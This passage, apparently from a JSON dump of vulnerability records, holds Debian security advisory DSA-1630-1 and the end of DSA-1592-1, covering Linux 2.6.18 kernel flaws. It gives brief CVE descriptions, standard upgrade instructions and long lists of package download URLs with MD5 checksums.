80a7c47d7ef1e55b62d345451753f14e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 195328 49223a37f981d8c5498f65b06c90900a\n\n These changes will probably be included in the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2008-06-09T06:38:31", "published": "2008-06-09T06:38:31", "id": "DEBIAN:DSA-1592-1:BE103", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00172.html", "title": "[SECURITY] [DSA 1592-1] New Linux 2.6.18 packages fix overflow conditions", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:11:20", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3272", "CVE-2007-6282", "CVE-2008-2826", "CVE-2008-0598", "CVE-2008-2729", "CVE-2008-2931", "CVE-2008-3275", "CVE-2008-2812"], "description": "- ----------------------------------------------------------------------\nDebian Security Advisory DSA-1630-1 security@debian.org\nhttp://www.debian.org/security/ dann frazier\nAug 21, 2008 http://www.debian.org/security/faq\n- ----------------------------------------------------------------------\n\nPackage : linux-2.6\nVulnerability : denial of service/information leak\nProblem type : several\nDebian-specific: no\nCVE Id(s) : CVE-2007-6282 CVE-2008-0598 CVE-2008-2729 CVE-2008-2812\n CVE-2008-2826 CVE-2008-2931 CVE-2008-3272 CVE-2008-3275\n\nSeveral vulnerabilities have been discovered in the Linux kernel that may\nlead to a denial of service or arbitrary code execution. The Common\nVulnerabilities and Exposures project identifies the following\nproblems:\n\nCVE-2007-6282\n\n Dirk Nehring discovered a vulnerability in the IPsec code that allows\n remote users to cause a denial of service by sending a specially crafted\n ESP packet.\n\nCVE-2008-0598\n\n Tavis Ormandy discovered a vulnerability that allows local users to access\n uninitialized kernel memory, possibly leaking sensitive data. This issue\n is specific to the amd64-flavour kernel images.\n\nCVE-2008-2729\n\n Andi Kleen discovered an issue where uninitialized kernel memory\n was being leaked to userspace during an exception. This issue may allow\n local users to gain access to sensitive data. Only the amd64-flavour\n Debian kernel images are affected.\n\nCVE-2008-2812\n\n Alan Cox discovered an issue in multiple tty drivers that allows\n local users to trigger a denial of service (NULL pointer dereference)\n and possibly obtain elevated privileges.\n\nCVE-2008-2826\n\n Gabriel Campana discovered an integer overflow in the sctp code that\n can be exploited by local users to cause a denial of service.\n\nCVE-2008-2931\n\n Miklos Szeredi reported a missing privilege check in the do_change_type()\n function. This allows local, unprivileged users to change the properties\n of mount points.\n\nCVE-2008-3272\n\n Tobias Klein reported a locally exploitable data leak in the\n snd_seq_oss_synth_make_info() function. This may allow local users\n to gain access to sensitive information.\n\nCVE-2008-3275\n\n Zoltan Sogor discovered a coding error in the VFS that allows local users\n to exploit a kernel memory leak resulting in a denial of service.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.6.18.dfsg.1-22etch2.\n\nWe recommend that you upgrade your linux-2.6, fai-kernels, and\nuser-mode-linux packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nThe following matrix lists additional source packages that were rebuilt for\ncompatability with or to take advantage of this update:\n\n Debian 4.0 (etch)\n fai-kernels 1.17+etch.22etch2\n user-mode-linux 2.6.18-1um-2etch.22etch2\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-22etch2.diff.gz\n Size/MD5 checksum: 5378366 80a876fbcded8984ff47308cf2ece776\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um.orig.tar.gz\n Size/MD5 checksum: 14435 4d10c30313e11a24621f7218c31f3582\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.22etch2.dsc\n Size/MD5 checksum: 740 080fa46e372743186c973658347ceee1\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1.orig.tar.gz\n Size/MD5 checksum: 52225460 6a1ab0948d6b5b453ea0fce0fcc29060\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.22etch2.dsc\n Size/MD5 checksum: 892 30580beb633eb4806c40d659f552cd88\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-22etch2.dsc\n Size/MD5 checksum: 5672 780d93329a4cedaad9d0539c1cc400ac\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.22etch2.diff.gz\n Size/MD5 checksum: 18180 2b9bbd3f4bcc3852320fc60d6947607e\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.22etch2.tar.gz\n Size/MD5 checksum: 56550 01fd54902e7ac7c3035c5176f1deae3c\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-6_2.6.18.dfsg.1-22etch2_all.deb\n Size/MD5 checksum: 3718952 804c3adc75403db743f603fd1dc44fa2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-22etch2_all.deb\n Size/MD5 checksum: 41460250 9fda57df0d76f6300b162c0765a87e32\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-22etch2_all.deb\n Size/MD5 checksum: 1632622 6d644a3a0502065b7a9faa9a7efdb8f4\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-22etch2_all.deb\n Size/MD5 checksum: 1087372 8ff719e7a81edaa38b5eca31a7aaee02\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-22etch2_all.deb\n Size/MD5 checksum: 3590476 b803de0252e4f027567c5c13db4afe0a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-22etch2_all.deb\n Size/MD5 checksum: 55722 a4dd6ba664f85780bbe1ebf7f3a77b25\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-22etch2_alpha.deb\n Size/MD5 checksum: 23464338 df80e9f9afac5942ec8cd73c8fa2acd3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_alpha.deb\n Size/MD5 checksum: 55150 c752933d6628e0ebe75dbe47f29ad4e2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-generic_2.6.18.dfsg.1-22etch2_alpha.deb\n Size/MD5 checksum: 268952 128bea32232629d3255799ddc83da7b3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-22etch2_alpha.deb\n Size/MD5 checksum: 269648 7617546d15e940343cbe381dfecae010\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-22etch2_alpha.deb\n Size/MD5 checksum: 3053804 f72f8a710f0a4da22bc8fd431d9195ee\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-smp_2.6.18.dfsg.1-22etch2_alpha.deb\n Size/MD5 checksum: 268368 5c248dbb5e31cc30d4148196b1f5cef0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-alpha_2.6.18.dfsg.1-22etch2_alpha.deb\n Size/MD5 checksum: 55180 2a8a3e402015cf1908906180eb6f8a5f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-smp_2.6.18.dfsg.1-22etch2_alpha.deb\n Size/MD5 checksum: 23846050 ba3b97267e75c3d8027627b2a3ece5fb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-generic_2.6.18.dfsg.1-22etch2_alpha.deb\n Size/MD5 checksum: 23485982 9ea2f705c0a99080425de75c48c66904\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-22etch2_alpha.deb\n Size/MD5 checksum: 269242 1edcca9164f4eecd392897903269c1e2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_alpha.deb\n Size/MD5 checksum: 3028978 253a048a7d3ccdf823b8e28b47e5f849\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.22etch2_amd64.deb\n Size/MD5 checksum: 5961854 67e6d9bddf32e6ff37f15a37f9aa2b04\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\n Size/MD5 checksum: 55174 94bc1ab70d46a153205059b1ba2fbd9e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\n Size/MD5 checksum: 279498 bf0107981fe6a603a9b72be5e94190bb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\n Size/MD5 checksum: 16909690 0d7e343ec621b05fb565ed0c4b355c9e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-22etch2_amd64.deb\n Size/MD5 checksum: 3252530 97dc43477d90cae8fd6b4033781ce589\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\n Size/MD5 checksum: 277930 b719a1156f14a870b6f0fed9fcac0e26\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\n Size/MD5 checksum: 55146 865ab31e1451d19f5374492c7b5cec02\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_amd64.deb\n Size/MD5 checksum: 55152 811c0ed6f63166536426b3a30a0ae6a0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\n Size/MD5 checksum: 1652318 1e02b1e5c1315c6775efd5a3ebb8eba0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_amd64.deb\n Size/MD5 checksum: 3228660 b3491a01820796609c57ff0ca45cd991\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\n Size/MD5 checksum: 1684052 214c87ec095a47ddb16cb5a0386385d0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\n Size/MD5 checksum: 15370528 6429150ddfdc20c94f5dd9223ce1eefa\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\n Size/MD5 checksum: 16955552 08dbcfaeb394f720be04b43584cc2dca\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\n Size/MD5 checksum: 277636 0c1dd9ed04830cef72a2799682cdb373\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-22etch2_amd64.deb\n Size/MD5 checksum: 3422414 a66a5347a66c224513912f23df6e7811\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-22etch2_amd64.deb\n Size/MD5 checksum: 3397342 d69524c251013eca5cb9c2fc6ac49f08\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\n Size/MD5 checksum: 278800 f808d9f0b51671184647976e61673ef7\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\n Size/MD5 checksum: 55126 dcc26a10c820fe676abf6d0a8f733190\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-amd64_2.6.18.dfsg.1-22etch2_amd64.deb\n Size/MD5 checksum: 15356684 ca635c5a74fde0c121ac8ad0dca7f3bc\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-ixp4xx_2.6.18.dfsg.1-22etch2_arm.deb\n Size/MD5 checksum: 240724 05944f6adaed3622fdbf4fa94d9e37c1\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_arm.deb\n Size/MD5 checksum: 55194 cfb4019acf8ce2b9eca9a06cde8fa6d8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-rpc_2.6.18.dfsg.1-22etch2_arm.deb\n Size/MD5 checksum: 200112 db009d7e4d83679ea6bf62352e8cbe27\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-iop32x_2.6.18.dfsg.1-22etch2_arm.deb\n Size/MD5 checksum: 7925520 1488da3529714a8490790357b2a28d34\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-iop32x_2.6.18.dfsg.1-22etch2_arm.deb\n Size/MD5 checksum: 235346 8bac39d6ded885fc5247046c1a0f5c1c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s3c2410_2.6.18.dfsg.1-22etch2_arm.deb\n Size/MD5 checksum: 205074 8fa04e311cd6e56aa2749d4146056c77\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-arm_2.6.18.dfsg.1-22etch2_arm.deb\n Size/MD5 checksum: 55234 060e1f4e0b26b2fb42fe0be4d8078952\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_arm.deb\n Size/MD5 checksum: 3411494 cfe4f5b7273940720e2bc1e945631f1c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-rpc_2.6.18.dfsg.1-22etch2_arm.deb\n Size/MD5 checksum: 4588214 42d8698407235b46507cf2d7b992c09c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-footbridge_2.6.18.dfsg.1-22etch2_arm.deb\n Size/MD5 checksum: 234198 35c06e74a9f26ab8217ea98df7c01a9b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-footbridge_2.6.18.dfsg.1-22etch2_arm.deb\n Size/MD5 checksum: 7567632 3e4a444afcf3df3e510e2c5000a4b684\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s3c2410_2.6.18.dfsg.1-22etch2_arm.deb\n Size/MD5 checksum: 5010844 a3a1c62fbe80192e80bcaac498036e92\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-ixp4xx_2.6.18.dfsg.1-22etch2_arm.deb\n Size/MD5 checksum: 8872222 e1a64be9bdc5246dd1d9ef666eb0a311\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-22etch2_hppa.deb\n Size/MD5 checksum: 11805014 e45047cea390fd98d4a55557414b578e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-hppa_2.6.18.dfsg.1-22etch2_hppa.deb\n Size/MD5 checksum: 55184 397ca7761578ce779b6ef9bacc372ffb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc_2.6.18.dfsg.1-22etch2_hppa.deb\n Size/MD5 checksum: 10551992 1d693cdd06bb4dee92a25cd886817522\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_hppa.deb\n Size/MD5 checksum: 55158 15e7aa685aea41e29ac6c76825e99ad6\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-22etch2_hppa.deb\n Size/MD5 checksum: 199066 5aaf2ce6a96449673f8a8f48f36cf841\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64_2.6.18.dfsg.1-22etch2_hppa.deb\n Size/MD5 checksum: 11400554 53c5eca027dc1015bf6423cbe65536cd\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc-smp_2.6.18.dfsg.1-22etch2_hppa.deb\n Size/MD5 checksum: 10998698 050980b34cbc925f0842c161828aa1f7\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64_2.6.18.dfsg.1-22etch2_hppa.deb\n Size/MD5 checksum: 197944 1d45f1fe804821cc7b8aa80b0dec4f36\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_hppa.deb\n Size/MD5 checksum: 3022526 52b6702172ceb2064dde03ea3cacca7a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc-smp_2.6.18.dfsg.1-22etch2_hppa.deb\n Size/MD5 checksum: 198152 556e2b16e2988976dac562f1baad15a9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc_2.6.18.dfsg.1-22etch2_hppa.deb\n Size/MD5 checksum: 197130 298d3e069a1f6996685c4a5a8bc1bada\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-686_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 16377614 74d1938921db193d10a0ff798fe7c005\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-686_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 272450 5468ca009d328fc890a6ab771ab20968\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-k7_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 16471330 35ea40d0f873d6c8ff819a62239623ac\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-k7_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 280452 b055d4305ed580aa9603c3ff5b8c48ef\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 16838150 45beacafd1a4902c055c41bd7711586a\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.22etch2_i386.deb\n Size/MD5 checksum: 25589346 bf03c496e08b7d40f52f602011c07560\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686-bigmem_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 16406940 0225f98fb843e23225875943b5179aa1\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-686_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 55132 28a33a24ebdcdcad85d335499397c88c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-i386_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 55196 16b6e16eefaeb5891ab4ba7f832d0ed3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 3169128 eb405a8b5c8b6d815c95f73262a99af1\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 55144 3d96d807e874865af58831720adb4486\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 3055432 a496fea546da3a21748b444ffd6836ec\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 272846 c58bde7235a1f1ac5c8145dc1ae9346b\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 55140 eee1bdfac4bbecc919d0151b2e23d24c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 14292444 19fe5544166f396830fef3a1b4e4626f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 280608 496144bbb1d620644189d012b9d6ea70\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-486_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 282902 f4145bd74ab9467b1af36da46b7666ef\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-k7_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 279034 26430131dc00922da7c9b034c191eaf1\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 272230 871474e9b227166f527391aa064ec971\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.22etch2_i386.deb\n Size/MD5 checksum: 5505296 9da61c3c82edf996a6324ebd4517251c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 3149672 c6cbb32f47b75db7d63a6fcf84e0df38\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 3171866 333ceba6af38b86e41a1db10fc764319\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686-bigmem_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 281062 c0c403aedd560ad15fb7d90c54ce3145\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-486_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 16192240 a4a3d514e989d64042c46d3ad8d0b0ae\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-686_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 278950 9de592d811e51eeb07ebe193f8734d15\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 16337664 a367c6561e7cf8ff701a731d8072dca2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 1328006 c5089d6b0fa44ce46fdbbd17140cb9c6\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-k7_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 16509906 c8894d32a5f39e7512d2db9de74ddf3c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-686_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 1300920 9c42c8356ab3a07b89f2d95f47de5303\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-686_2.6.18.dfsg.1-22etch2_i386.deb\n Size/MD5 checksum: 14281014 32f281f475d4ee1f2d67dd029231ea46\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-mckinley_2.6.18.dfsg.1-22etch2_ia64.deb\n Size/MD5 checksum: 256640 e96b0df79e67e6049d8feeb73e63f287\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-ia64_2.6.18.dfsg.1-22etch2_ia64.deb\n Size/MD5 checksum: 55174 c93847739b57f47faacaf642de4ab6c1\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-itanium_2.6.18.dfsg.1-22etch2_ia64.deb\n Size/MD5 checksum: 256732 af4ee0bbafe50ce27d875243fe626ab9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-mckinley_2.6.18.dfsg.1-22etch2_ia64.deb\n Size/MD5 checksum: 28181368 dff959a14317741919a7a46d73c273a8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_ia64.deb\n Size/MD5 checksum: 55146 9f30373190856528f752d21d66a88053\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-itanium_2.6.18.dfsg.1-22etch2_ia64.deb\n Size/MD5 checksum: 28014200 d290bc90985342dfe3b348d3e1d07922\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_ia64.deb\n Size/MD5 checksum: 3083012 cbb353d4e8cb3a2bfc4dbf43f4427344\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-22etch2_mips.deb\n Size/MD5 checksum: 8311782 6b24a125c1b553bd4f69d830f2d19eaa\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-qemu_2.6.18.dfsg.1-22etch2_mips.deb\n Size/MD5 checksum: 6124616 ab5d97cb43f8e7d0f7cfebe2db2416df\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-22etch2_mips.deb\n Size/MD5 checksum: 55190 1cd7be3bb06e63ecf67e6c5c175aa201\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-22etch2_mips.deb\n Size/MD5 checksum: 187898 a74c79e4b6de9312c1a531b7d1c04e06\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-22etch2_mips.deb\n Size/MD5 checksum: 164036 58db324ddfe7d1b3f7086c67091c1ae3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-22etch2_mips.deb\n Size/MD5 checksum: 15654946 4c99171f6b6e8e0b06d88f65244f5a5c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-qemu_2.6.18.dfsg.1-22etch2_mips.deb\n Size/MD5 checksum: 155578 71edf3d7d29b414ee8fe9c26d98afe2f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-22etch2_mips.deb\n Size/MD5 checksum: 15680482 79ca37454bab6d11c4af5621e3963e87\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-22etch2_mips.deb\n Size/MD5 checksum: 168240 0eafb18463f917510d3110c74786742d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_mips.deb\n Size/MD5 checksum: 3415314 94c72a62a2c3c52535c3ef4936400ad9\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-22etch2_mips.deb\n Size/MD5 checksum: 9077040 581d6744c0c10ec63b06b5d058e44a87\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-mips_2.6.18.dfsg.1-22etch2_mips.deb\n Size/MD5 checksum: 55236 7c94ce0a6b000ba9abcc0bf8272e033c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-22etch2_mips.deb\n Size/MD5 checksum: 188208 2356f7b9cf66b0694b1b7bb07e9e1df0\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-22etch2_mipsel.deb\n 